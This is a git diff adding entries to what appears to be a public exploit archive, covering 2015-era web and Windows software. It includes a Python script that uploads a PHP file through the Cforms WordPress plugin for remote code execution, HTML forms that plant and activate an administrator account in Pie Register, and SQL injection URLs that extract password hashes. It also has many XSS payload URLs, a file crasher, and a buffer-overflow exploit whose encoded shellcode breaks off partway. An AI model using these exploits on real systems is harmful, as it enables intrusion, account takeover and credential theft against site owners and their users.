+http://security.szurek.pl/pie-register-2013-privilege-escalation.html
+
+2. Proof of Concept
+
+Create CSV file based on given example:
+
+"Username","Display name","E-mail","User Registered","First Name","Last Name","Nickname","Role"
+"hack","Hacked","hacked@hacked.hacked","2010-10-10 20:00:00","Hacked","Hacked","Hacked","administrator"
+
+Import account using:
+
+<form method="post" action="http://wordpress-instalation" enctype="multipart/form-data">
+    Input CSV<input type="file" name="csvfile">
+    <input type="submit" value="Add user!">
+</form>
+
+Create another standard account using wp-login.php?action=register.
+
+After login go to wp-admin/profile.php and search "uid" in page source.
+
+Number after "uid" is our current account id. For example: "uid":"123".
+
+We can assume that previously imported admin account has id-1 (or id-x where x is natural number).
+
+We can activate this account using:
+
+<form method="post" action="http://wordpress-instalation">
+    <input type="hidden" name="verifyit" value="1">
+    Account id:<input type="text" name="vusers[]" value="">
+    <input type="submit" value="Activate user!">
+</form>
+
+Finally we can reset password using: http://wordpress-instalation/wp-login.php?action=lostpassword
+  
+3. Solution:
+  
+Update to version 2.0.14
+https://downloads.wordpress.org/plugin/pie-register.2.0.14.zip
\ No newline at end of file
diff --git a/platforms/php/webapps/35860.txt b/platforms/php/webapps/35860.txt
new file mode 100755
index 000000000..91bb0e06a
--- /dev/null
+++ b/platforms/php/webapps/35860.txt
@@ -0,0 +1,36 @@
+# Exploit Title: vBulletin vBSSO Single Sign-On – <= 1.4.14 – SQL Injection
+# Date: January 20, 2015
+# Exploit Author: Technidev (https://technidev.com)
+# Vendor Homepage: https://vbulletin.com
+# Software Link: http://www.vbulletin.org/forum/showthread.php?t=270517
+# Version: <= 1.4.14, patched in >= 1.4.15
+
+This plugin is vulnerable to SQL injection at the /vbsso/avatar.php file 
+in the fetchUserinfo function.
+It requires a big UNION ALL SELECT query and commenting out the LIMIT 
+function of SQL. If SQL injection is a success, the browser will 
+redirect the user to a URL where the URL contains the extracted information.
+
+To exploit this, you need to execute a rather large UNION ALL SELECT 
+query like this:
+http://example.com/vbsso/vbsso.php?a=act&do=avatar&id=' or user.userid = 
+1 UNION ALL SELECT userfield.*, usertextfield.*, user.*, 
+usergroup.genericpermissions, UNIX_TIMESTAMP(passworddate) AS 
+passworddate, IF(displaygroupid=0, user.usergroupid, displaygroupid) AS 
+displaygroupid, concat(user.password, 0x3a, user.salt) AS avatarpath, 
+NOT ISNULL(customavatar.userid) AS hascustomavatar, 
+customavatar.dateline AS avatardateline, customavatar.width AS avwidth, 
+customavatar.height AS avheight, customavatar.height_thumb AS 
+avheight_thumb, customavatar.width_thumb AS avwidth_thumb, 
+customavatar.filedata_thumb FROM user AS user LEFT JOIN userfield AS 
+userfield ON (user.userid = userfield.userid) LEFT JOIN usergroup AS 
+usergroup ON (usergroup.usergroupid = user.usergroupid) LEFT JOIN 
+usertextfield AS usertextfield ON (usertextfield.userid = user.userid) 
+LEFT JOIN avatar AS avatar ON (avatar.avatarid = user.avatarid) LEFT 
+JOIN customavatar AS customavatar ON (customavatar.userid = user.userid) 
+WHERE user.userid = 1 ORDER BY avatarpath DESC%23
+
+For example, by visiting this URL on a vulnerable forum, you will be 
+redirected to 
+http://example.com/9d0d647f535a4c1f493eabf3d69ca89a:nO^sh9;TVNxGJ”X’+3cYkq9Z4Cd3WS 
+which obviously contains the hash and salt of userid 1.
diff --git a/platforms/php/webapps/35879.txt b/platforms/php/webapps/35879.txt
new file mode 100755
index 000000000..abf4d77bc
--- /dev/null
+++ b/platforms/php/webapps/35879.txt
@@ -0,0 +1,112 @@
+# Exploit Title: Remote Code Execution via Unauthorised File upload in Cforms 14.7 
+# Date: 2015-01-19
+# Exploit Author: Zakhar
+# Vendor Homepage: https://wordpress.org/plugins/cforms2/
+# Software Link: https://downloads.wordpress.org/plugin/cforms2.zip
+# Version: 14.7
+# Tested on: Wordpress 4.0
+# CVE : 2014-9473
+
+import os
+import requests
+import re
+import base64
+import sys
+from lxml import etree
+from optparse import OptionParser
+
+def main():
+	print 'Cforms II File Upload + Remote Code Execution\n'
+	
+	text = 'Test text'
+	text_mail = 'test@mail.com'
+
+	parser = OptionParser()
+	parser.add_option("-f", "--file", dest="file", help="file to upload", default = "itest.php", metavar="FILE")
+	parser.add_option("-i", "--max-iterations", dest="iterations", help="Numbe of fields to iterate", default = "10")
+	parser.add_option("-b", "--upload-file-name-bruteforce", dest="brute", help="Uploaded file name brute force", default = "10")
+	parser.add_option("-n", "--cforms-form-number", dest="number", help="Cforms form number", default = "")
+	parser.add_option("-c", "--cforms-home-dir", dest="home", help="Cforms form home dir", default = "/wp-content/plugins/cforms2/")
+	parser.add_option("-u", "--url", dest="url", help="vulnerable url with contact form, example: http://127.0.0.1/Contact/")
+
+	(opt, args) = parser.parse_args()
+	options = opt.__dict__
+	if not opt.url:   # if url is not given
+		parser.error('URL not given')
+	if not opt.file:
+		parser.error('file not given')
+	filename = options["file"]
+	if os.path.isfile(filename) is not True:
+		print 'No such file '+filename 
+		return 0
+
+	url = options['url']
+	home = options["home"]
+	i = options["iterations"]
+	n = options["number"]
+	b = options["brute"]
+	
+	s = requests.Session()
+	
+	r = s.get(url)
+	if r.status_code != requests.codes.ok:
+		print 'Error: website not found.'
+		return 0
+	
+	tree = etree.HTML(r.text)
+	# get cforms id
+	if n is "":
+		for x in xrange(2,10):
+			for node in tree.xpath('//*[@id="cforms'+str(x)+'form"]'):
+				if node is not None:
+					n = str(x)
+					break
+	print 'Cforms form number is <'+n+'>'
+	hidden = ['cf_working'+n,'cf_failure'+n,'cf_codeerr'+n,'cf_customerr'+n,'cf_popup'+n]
+	fields = ['cf'+n+'_field_'+str(x) for x in xrange(1,int(i)+1)]
+	required = {'sendbutton'+n:'1'}
+	
+	for f in fields:
+		for node in tree.xpath('//*[@id="' + f + '"]'):
+			if node is not None:
+				if 'fldrequired' in node.get('class'):
+					if 'fldemail' in node.get('class'):
+						required[f] = text_mail
+					else:
+						required[f] = text
+	
+	for h in hidden:
+		for node in tree.xpath('//*[@id="' + h + '"]'):
+			if node is not None:
+				required[h] = node.get('value')
+	
+	for node in tree.xpath('//*[@id="cforms_captcha'+n+'"]'):
+		if node is not None:
+			print 'Error: Cforms uses captcha. Sorry, you have to exploit it manually.'
+			return 0
+	
+	files = {'cf_uploadfile'+n+'[]':('wow.php',open(filename))}
+	r = s.post(url,data=required,files=files)
+	
+	if r.status_code != requests.codes.ok:
+		print 'Error: post error.'
+		print r.status_code
+		return 0
+	else:
+		url1 = url + home + 'noid-wow.php'
+		flag = 0
+		if s.get(url1).status_code != requests.codes.ok:
+			for l in xrange(1,int(b)):
+				url1 =  url + home + str(l) + '-wow.php'
+				print url1
+				if s.get(url1).status_code == requests.codes.ok:
+					flag = 1
+					break
+		else:
+			flag = 1
+		if flag == 1:
+			print "Succes! Uploaded file: " + url1
+		else:
+			print "Uploaded file not found. Try to increase -b flag or change upload dir. 14.6.3 version and above use wordpress upload folder"
+
+main()
\ No newline at end of file
diff --git a/platforms/php/webapps/35916.txt b/platforms/php/webapps/35916.txt
new file mode 100755
index 000000000..cde704bbe
--- /dev/null
+++ b/platforms/php/webapps/35916.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Photo Gallery 1.2.5 Unrestricted File Upload
+# Date: 11-11-2014
+# Software Link: https://wordpress.org/plugins/photo-gallery/
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# CVE: CVE-2014-9312
+# Category: webapps
+
+1. Description
+  
+Every registered user (even Subscriber) can access upload functionality because of read role used inside UploadHandler.php
+
+http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html
+  
+2. Proof of Concept
+
+Login as regular user (created using wp-login.php?action=register).
+
+Pack .php files into .zip archive then send it using:
+
+<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/" enctype="multipart/form-data">
+    <input type="file" name="files">
+    <input type="submit" value="Hack!">
+</form>
+
+Your files will be visible inside:
+
+http://wordpress-install/wp-admin/rce/
+  
+3. Solution:
+  
+Update to version 1.2.6
+https://downloads.wordpress.org/plugin/photo-gallery.1.2.6.zip
\ No newline at end of file
diff --git a/platforms/php/webapps/35950.txt b/platforms/php/webapps/35950.txt
new file mode 100755
index 000000000..b9bf32cf2
--- /dev/null
+++ b/platforms/php/webapps/35950.txt
@@ -0,0 +1,127 @@
+Title -  NPDS CMS Revolution-13 - SQL Injection Vulnerability
+
+Credits & Author: 
+Narendra Bhati  (  R00t Sh3ll ) 
+www.websecgeeks.com
+
+References (Source):
+====================
+http://www.npds.org/viewtopic.php?topic=26233&forum=12
+http://websecgeeks.com/npds-cms-sql-injection/
+
+Release Date:
+=============
+24-01-2015
+
+
+CVE ID :
+====================================
+CVE-2015-1400
+
+
+
+Product & Service Introduction:
+===============================
+http://www.npds.org/
+
+Abstract Advisory Information:
+==============================
+Narendra Bhati ( R00t Sh3ll ) An Information Security Analyst In Pune ( India ) discovered a remote sql injection  vulnerability in the NPDS CMS .
+
+
+Vulnerability Disclosure Timeline:
+==================================
+25-01-2015 :  Public Disclosure
+
+
+Timeline Status:
+=================
+Reported To Vendor  14-12-2014 
+Verified By Vendor 15-12-2014
+Acknowledge By Vendor 14-01-2015
+Public Disclosure By Vendor 24-01-2015
+Technical Disclosure  25-01-2015
+Vendor Security Advisory  http://www.npds.org/viewtopic.php?topic=26233&forum=12 
+Technical Disclosure - http://websecgeeks.com/npds-cms-sql-injection/
+CVE-2015-1400
+Mitigation For This Vulnerability  There Is No Update By Vendor , But That Will Be Out Soon !
+
+Affected Product(s):
+====================
+NPDS-Revolution-13
+
+Exploitation Technique:
+=======================
+Remote
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A sql injection web vulnerability has been discovered in the NPDS CMS - NPDS-Revolution-13.
+The vulnerability allows an attacker to inject sql commands by usage of a vulnerable value to compromise the application dbms.
+
+The sql injection vulnerability is located in the `query` parameter of the vulnerable `search.php ` application file. Remote attackers 
+are able to inject own sql commands by usage of vulnerable `search.php ` file. A successful attack requires to 
+manipulate a POST method request with vulnerable parameter `query` value to inject own sql commands. The injection is a time based ( tested ) by sql injection 
+that allows to compromise the web-application and connected dbms.
+
+Request Method(s):
+        [+] POST
+
+Vulnerable Module(s):
+        [+] NPDS-Revolution-13
+
+Vulnerable File(s):
+        [+] search.php
+
+Vulnerable Parameter(s):
+        [+] query
+
+
+Proof of Concept (PoC):
+=======================
+The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account.
+For reproduce the security vulnerability follow the provided information and steps below to continue.
+
+HTTP Request
+
+##### ==========
+POST /npds/search.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/npds/index.php?op=edito
+Cookie: cookievalue
+Connection: keep-alive
+content-type:! application/x-www-form-urlencoded
+Content-Length: 63
+
+query=")and benchmark(20000000,sha1(1))-
+
+====================================
+Reference(s):
+http://www.npds.org/viewtopic.php?topic=26233&forum=12
+http://websecgeeks.com/npds-cms-sql-injection/
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse and encode of the vulnerability `query` parameter value in the search.php file.
+Use a prepared statement to fix the issues fully and setup own exception that prevents sql injection attacks.
+
+
+Security Risk:
+==============
+The security risk of the remote sql injection web vulnerability as critical
+
+
+Credits & Author:
+==================
+Narendra Bhati  (  R00t Sh3ll )
+www.websecgeeks.com
diff --git a/platforms/php/webapps/35975.txt b/platforms/php/webapps/35975.txt
new file mode 100755
index 000000000..684c97fb7
--- /dev/null
+++ b/platforms/php/webapps/35975.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/48814/info
+
+Cyberoam UTM is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?srcip=<script>alert(document.cookie)</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/35976.txt b/platforms/php/webapps/35976.txt
new file mode 100755
index 000000000..6efeec03c
--- /dev/null
+++ b/platforms/php/webapps/35976.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/48835/info
+
+Synergy Software is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+http://www.example.com/courses.php?id=-1 union select null,user_loginname_vc,null,null,null,user_pass_vc,null,null,null,null from user_m 
\ No newline at end of file
diff --git a/platforms/php/webapps/35977.txt b/platforms/php/webapps/35977.txt
new file mode 100755
index 000000000..b1642e212
--- /dev/null
+++ b/platforms/php/webapps/35977.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/48872/info
+
+Godly Forums is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/Forum/topics.php?id=2 
\ No newline at end of file
diff --git a/platforms/php/webapps/35978.txt b/platforms/php/webapps/35978.txt
new file mode 100755
index 000000000..55e44d070
--- /dev/null
+++ b/platforms/php/webapps/35978.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/48875/info
+
+Online Grades is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Online Grades 3.2.5 is vulnerable; other versions may also be affected. 
+
+
+http://www.example.com/admin/admin.php?func=1"><script>alert(1)</script>&skin=classic
+http://www.example.com/admin/admin.php?func=0&skin=1"><script>alert(1)</script>
+http://www.example.com/admin/admin.php?func=0&todo=1"><script>alert(1)</script>
+http://www.example.com/admin/admin.php?func=0&what=1"><script>alert(1)</script>&who=Faculty
+http://www.example.com/admin/admin.php?func=0&what=mail&who=1"><script>alert(1)</script>
+http://www.example.com/admin/admin.php/>"><script>alert(1)</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/35979.txt b/platforms/php/webapps/35979.txt
new file mode 100755
index 000000000..005b28641
--- /dev/null
+++ b/platforms/php/webapps/35979.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/48878/info
+
+Willscript Recipes website Script Silver Edition is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to execute arbitrary code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/new_recipes/recipes/viewRecipe.php?recipeId=44 
\ No newline at end of file
diff --git a/platforms/php/webapps/35984.txt b/platforms/php/webapps/35984.txt
new file mode 100755
index 000000000..71da4ee39
--- /dev/null
+++ b/platforms/php/webapps/35984.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48883/info
+
+The 'com_virtualmoney' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Virtual Money 1.5 is affected; other versions may also be vulnerable. 
+
+www.example.com/index.php?option=com_virtualmoney&view=landpage&task=subcategory&catid=[EXPLOIT] 
\ No newline at end of file
diff --git a/platforms/php/webapps/35985.txt b/platforms/php/webapps/35985.txt
new file mode 100755
index 000000000..99b5c775c
--- /dev/null
+++ b/platforms/php/webapps/35985.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48896/info
+
+Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sit/report_marketing.php?mode=report&exc[0]=1'
\ No newline at end of file
diff --git a/platforms/php/webapps/35986.txt b/platforms/php/webapps/35986.txt
new file mode 100755
index 000000000..6033973bd
--- /dev/null
+++ b/platforms/php/webapps/35986.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48896/info
+ 
+Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+ 
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+ 
+Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sit/billable_incidents.php?sites[]=-1 union select 1,concat_ws(':',user(),database())
\ No newline at end of file
diff --git a/platforms/php/webapps/35987.txt b/platforms/php/webapps/35987.txt
new file mode 100755
index 000000000..320e2ceb5
--- /dev/null
+++ b/platforms/php/webapps/35987.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48896/info
+  
+Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+  
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+  
+Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sit/search.php?search_string=1' union select 1,version() 
\ No newline at end of file
diff --git a/platforms/php/webapps/35988.txt b/platforms/php/webapps/35988.txt
new file mode 100755
index 000000000..30bf12b71
--- /dev/null
+++ b/platforms/php/webapps/35988.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48896/info
+   
+Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+   
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+   
+Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sit/tasks.php?selected[]=1'&action=markcomplete
\ No newline at end of file
diff --git a/platforms/php/webapps/35989.txt b/platforms/php/webapps/35989.txt
new file mode 100755
index 000000000..7726a0599
--- /dev/null
+++ b/platforms/php/webapps/35989.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48902/info
+
+MBoard is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing attacks; other attacks are possible.
+
+MBoard 1.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/go.php?url=http://example.com 
\ No newline at end of file
diff --git a/platforms/php/webapps/35990.txt b/platforms/php/webapps/35990.txt
new file mode 100755
index 000000000..9e22eb8c5
--- /dev/null
+++ b/platforms/php/webapps/35990.txt
@@ -0,0 +1,39 @@
+source: http://www.securityfocus.com/bid/48905/info
+
+PHPJunkYard GBook is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PHPJunkYard GBook 1.7 is vulnerable; other versions may also be affected. 
+
+
+
+http://www.example.com/templates/default/admin_reply.php?error=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/templates/default/admin_reply.php?comments=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29 ;%3C/script%3E
+http://www.example.com/templates/default/admin_reply.php?nosmileys=%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E
+http://www.example.com/templates/default/admin_reply.php?num=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/templates/default/comments.php?name=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/templates/default/comments.php?from=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/templates/default/comments.php?name=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/templates/default/comments.php?email=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/templates/default/comments.php?added=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/templates/default/comments.php?i=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/templates/default/admin_tasks.php?error=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/templates/default/admin_tasks.php?task=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/templates/default/admin_tasks.php?task_description=%3Cscript%3Ealert%28document.cookie%29;%3C/sc ript%3E
+http://www.example.com/templates/default/admin_tasks.php?action=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E
+http://www.example.com/templates/default/admin_tasks.php?button=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E
+http://www.example.com/templates/default/admin_tasks.php?num=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/templates/default/emoticons_popup.php?list_emoticons=%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E
+
+http://www.example.com/templates/default/error.php?myproblem=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/templates/default/error.php?backlink=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/templates/default/no_comments.php?lang[t06]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/templates/default/overall_footer.php?settings[pages_top]=%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E
+http://www.example.com/templates/default/overall_footer.php?settings[show_nospam]=1&settings[target]=%22%3E%3Cscrip t%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/templates/default/overall_footer.php?settings[show_nospam]=1&settings[tpl_path]=%22%3E%3Cscr ipt%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/templates/default/overall_header.php?settings[gbook_title]=%3Cscript%3Ealert%28document.cookie%2 9;%3C/script%3E
+http://www.example.com/templates/default/sign_form.php?name=%22%3E%3Cscript%3Ealert%28document.cook
\ No newline at end of file
diff --git a/platforms/windows/dos/35889.py b/platforms/windows/dos/35889.py
new file mode 100755
index 000000000..b5c266a5b
--- /dev/null
+++ b/platforms/windows/dos/35889.py
@@ -0,0 +1,96 @@
+# Exploit Title: [Icecream Ebook Reader v1.41 (.mobi/.prc) Denial of Service]
+# Date: [23/01/2015]
+# Exploit Author: [Kapil Soni]
+# Twitter: [@Haxinos]
+# Vendor Homepage: [http://icecreamapps.com/]
+# Version: [Icecream Ebook Reader v1.41]
+# Tested on: [Windows XP SP2]
+
+#Technical Details & Description:
+#================================
+#A Memory Corruption Vulnerability is detected on Icecream Ebook Reader v1.41. An attacker can crash the software by using .mobi and .prc file.
+#Attackers can crash the software local by user inter action over .mobi and .prc (ebooks).
+
+
+#Piece of Code
+#========================================================================
+
+#!/usr/bin/python
+
+buffer = "A"*1000
+
+filename = "crash"+".mobi" # For testing with .prc, change the extension
+file = open(filename, 'w')
+file.write(buffer)
+file.close()
+
+print "File Successfully Created [1]"
+
+#========================================================================
+#Debugging and Error Log
+#========================
+
+#Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
+#Copyright (c) Microsoft Corporation. All rights reserved.
+#*** wait with pending attach
+#Symbol search path is: *** Invalid ***
+#****************************************************************************
+#* Symbol loading may be unreliable without a symbol search path.           *
+#* Use .symfix to have the debugger choose a symbol path.                   *
+#* After setting your symbol path, use .reload to refresh symbol locations. *
+#****************************************************************************
+#Executable search path is: 
+#ModLoad: 00400000 00bd2000   C:\Program Files\Icecream Ebook Reader\ebookreader.exe
+#ModLoad: 7c900000 7c9b0000   C:\WINDOWS\system32\ntdll.dll
+#ModLoad: 7c800000 7c8f4000   C:\WINDOWS\system32\kernel32.dll
+#ModLoad: 67000000 673f1000   C:\Program Files\Icecream Ebook Reader\Qt5Core.dll
+#ModLoad: 00d30000 01158000   C:\Program Files\Icecream Ebook Reader\Qt5Gui.dll
+#.... Snipped
+#ModLoad: 769c0000 76a73000   C:\WINDOWS\system32\userenv.dll
+#ModLoad: 01960000 0196c000   C:\Program Files\Icecream Ebook Reader\imageformats\qdds.dll
+#ModLoad: 01970000 01979000   C:\Program Files\Icecream Ebook Reader\imageformats\qgif.dll
+#ModLoad: 01b10000 01b18000   C:\Program Files\Icecream Ebook Reader\imageformats\qwbmp.dll
+#ModLoad: 01b20000 01b66000   C:\Program Files\Icecream Ebook Reader\imageformats\qwebp.dll
+#ModLoad: 09e70000 09f0f000   C:\Program Files\Icecream Ebook Reader\sqldrivers\qsqlite.dll
+#ModLoad: 20000000 202c5000   C:\WINDOWS\system32\xpsp2res.dll
+#(f9c.e34): Break instruction exception - code 80000003 (first chance)
+#eax=7ffd7000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
+#eip=7c901230 esp=0a67ffcc ebp=0a67fff4 iopl=0         nv up ei pl zr na pe nc
+#cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
+#*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll - 
+#ntdll!DbgBreakPoint:
+#7c901230 cc              int     3
+#0:003> g
+#ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\Comdlg32.dll
+#ModLoad: 77b40000 77b62000   C:\WINDOWS\system32\appHelp.dll
+#ModLoad: 76fd0000 7704f000   C:\WINDOWS\system32\CLBCATQ.DLL
+#ModLoad: 77050000 77115000   C:\WINDOWS\system32\COMRes.dll
+#... Snipped
+#ModLoad: 771b0000 77256000   C:\WINDOWS\system32\WININET.dll
+#ModLoad: 76f60000 76f8c000   C:\WINDOWS\system32\WLDAP32.dll
+#ModLoad: 74e30000 74e9c000   C:\WINDOWS\system32\RichEd20.dll
+#ModLoad: 76980000 76988000   C:\WINDOWS\system32\LINKINFO.dll
+#QIODevice::read: Called with maxSize < 0
+#QIODevice::read: Called with maxSize < 0
+
+#(f9c.998): Access violation - code c0000005 (first chance)
+#First chance exceptions are reported before any exception handling.
+#This exception may be expected and handled.
+#eax=6723d888 ebx=00000000 ecx=00000000 edx=ffffffff esi=0012cd9c edi=0012cf38
+#eip=671da2a7 esp=0012cc30 ebp=0012cc90 iopl=0         nv up ei pl nz na pe cy
+#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010207
+#*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Icecream Ebook Reader\Qt5Core.dll - 
+#Qt5Core!QTextCodec::toUnicode+0x7:
+#671da2a7 8b11            mov     edx,dword ptr [ecx]  ds:0023:00000000=????????
+
+#Exploitation Technique:
+#============================
+#Local, DoS, Memory Corruption
+
+#Solution - Fix & Patch:
+#=======================
+#Restrict working maximum size & set a own exception-handling for over-sized requests.
+
+#Author:
+#=======
+#Kapil Soni (Haxinos)
diff --git a/platforms/windows/local/35812.py b/platforms/windows/local/35812.py
new file mode 100755
index 000000000..00511973c
--- /dev/null
+++ b/platforms/windows/local/35812.py
@@ -0,0 +1,71 @@
+#!/usr/bin/python
+# coding: utf-8
+#Exploit Title:T-Mobile Internet Manager SEH Buffer Overflow 
+#Version:Internet Manager Software für Windows (TMO_PCV1.0.5B06)
+#Software for usb Wireless:T-Mobile web'n'walk Stick Fusion
+#Homepage:https://www.t-mobile.de/meinhandy/1,25412,19349-_,00.html
+#Software Link:https://www.t-mobile.de/downloads/neu/winui.zip
+#Found:8.01.2015
+#Exploit Author: metacom - twitter.com/m3tac0m
+#Tested on: Win-7 En, Win-8.1 DE-Enterprise, Win-XPSp3 EN
+#Video poc:http://bit.ly/17DhwSR
+print "[*]Copy UpdateCfg.ini to C:\Program Files\T-Mobile\InternetManager_Z\Bin\n"
+print "[*]Open Program and go to Menu-Options \n"
+print "[*]Click Update and press Now look for Update\n"
+from struct import pack
+junk="\x41" * 18073
+nseh="\xeb\x06\x90\x90" 
+seh=pack('<I',0x6900CEAE)#6900CEAE 5F  POP EDI intl.dll
+nops="\x90" * 100
+#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | 
+#msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x1a\xff" -t c
+shellcode=("\x89\xe2\xdd\xc1\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
+"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
+"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
+"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
+"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4d\x59\x55\x50"
+"\x35\x50\x35\x50\x53\x50\x4d\x59\x4b\x55\x46\x51\x59\x42\x33"
+"\x54\x4c\x4b\x56\x32\x30\x30\x4c\x4b\x31\x42\x44\x4c\x4c\x4b"
+"\x30\x52\x45\x44\x4c\x4b\x44\x32\x57\x58\x34\x4f\x38\x37\x50"
+"\x4a\x51\x36\x46\x51\x4b\x4f\x30\x31\x49\x50\x4e\x4c\x47\x4c"
+"\x33\x51\x43\x4c\x34\x42\x36\x4c\x31\x30\x49\x51\x48\x4f\x54"
